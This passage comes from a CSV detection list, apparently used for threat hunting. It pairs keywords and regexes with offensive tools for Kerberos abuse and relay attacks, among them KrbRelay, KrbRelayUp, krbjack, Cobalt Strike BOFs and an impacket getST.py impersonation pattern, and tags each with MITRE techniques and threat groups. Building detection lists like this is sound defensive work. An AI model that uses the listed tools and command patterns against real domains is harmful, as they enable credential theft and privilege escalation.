Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50579"
"*krb_s4u /*",".{0,1000}krb_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50580"
"*krb_tgtdeleg /*",".{0,1000}krb_tgtdeleg\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50581"
"*krb_tgtdeleg(*)*",".{0,1000}krb_tgtdeleg\(.{0,1000}\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50582"
"*krb_triage /*",".{0,1000}krb_triage\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50583"
"*krb2john.py*",".{0,1000}krb2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50584"
"*krb5/kerberosv5.py*",".{0,1000}krb5\/kerberosv5\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50585"
"*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *",".{0,1000}KRB5CCNAME\=.{0,1000}\.ccache.{0,1000}\sgetST\.py\s\-self\s\-impersonate\s.{0,1000}\s\-k\s\-no\-pass\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50586"
"*krb5decoder*",".{0,1000}krb5decoder.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50587"
"*krb5-enum-users *",".{0,1000}krb5\-enum\-users\s.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50588"
"*krb5-enum-users.*",".{0,1000}krb5\-enum\-users\..{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50589"
"*krbasktgt /*",".{0,1000}krbasktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","50590"
"*krbcredccache.py*",".{0,1000}krbcredccache\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50591"
"*krbjack -*",".{0,1000}krbjack\s\-.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50592"
"*krbjack.tcpforward*",".{0,1000}krbjack\.tcpforward.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50593"
"*krbjacker.py*",".{0,1000}krbjacker\.py.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50594"
"*krbjack-main*",".{0,1000}krbjack\-main.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","50595"
"*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50596"
"*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","50597"
"*KrbRelay by @Cube0x0*",".{0,1000}KrbRelay\sby\s\@Cube0x0.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50598"
"*KrbRelay*misc*",".{0,1000}KrbRelay.{0,1000}misc.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50599"
"*KrbRelay*smb*",".{0,1000}KrbRelay.{0,1000}smb.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50600"
"*KrbRelay*spoofing*",".{0,1000}KrbRelay.{0,1000}spoofing.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50601"
"*KrbRelay.Clients.Attacks*",".{0,1000}KrbRelay\.Clients\.Attacks.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50602"
"*KrbRelay.csproj*",".{0,1000}KrbRelay\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50603"
"*KrbRelay.exe *",".{0,1000}KrbRelay\.exe\s.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50604"
"*KrbRelay.exe *",".{0,1000}KrbRelay\.exe\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50605"
"*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50606"
"*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50607"
"*KrbRelay.sln*",".{0,1000}KrbRelay\.sln.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","50608"
"*KrbRelayUp - Relaying you to SYSTEM*",".{0,1000}KrbRelayUp\s\-\sRelaying\syou\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50609"
"*KrbRelayUp.csproj*",".{0,1000}KrbRelayUp\.csproj.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","50610"
"*KrbRelayUp.DSInternals.Common.Properties*",".{0,1000}KrbRelayUp\.DSInternals\.Common\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","50611"
"*KrbRelayUp.exe *",".{0,1000}KrbRelayUp\.exe\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Back Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50612"
